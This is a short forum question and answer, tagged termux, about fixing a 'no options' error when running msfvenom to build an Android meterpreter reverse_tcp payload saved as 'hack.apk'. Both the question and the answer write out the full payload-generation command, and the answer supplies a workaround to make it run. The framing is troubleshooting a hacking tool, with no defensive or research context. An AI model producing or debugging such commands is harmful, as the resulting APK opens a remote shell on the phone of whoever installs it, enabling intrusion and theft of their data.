# How do i solve msfvenom no options erro?

Tags: termux

I write this code in termux :
msfvenom -p android/meterpreter/reverse_tcp LHOST=myip LPORT=port -o hack.apk

And in asnswer :
Error : no options

How can i solve?

Answer (score 0):

There is an easy fix for this error as per my experience

If you installed metasploit-framework correctly the following workaround WILL work

1. navigate to the metasploit-framework directory usually, `cd ~/metasploit-framework` should do the job
2. Run the same command using 'ruby' i.e. `ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=myip LPORT=port -o hack.apk`

   3. This shall fix the error you mentioned but note that you might have installation errors in metasploit-framework as I have had too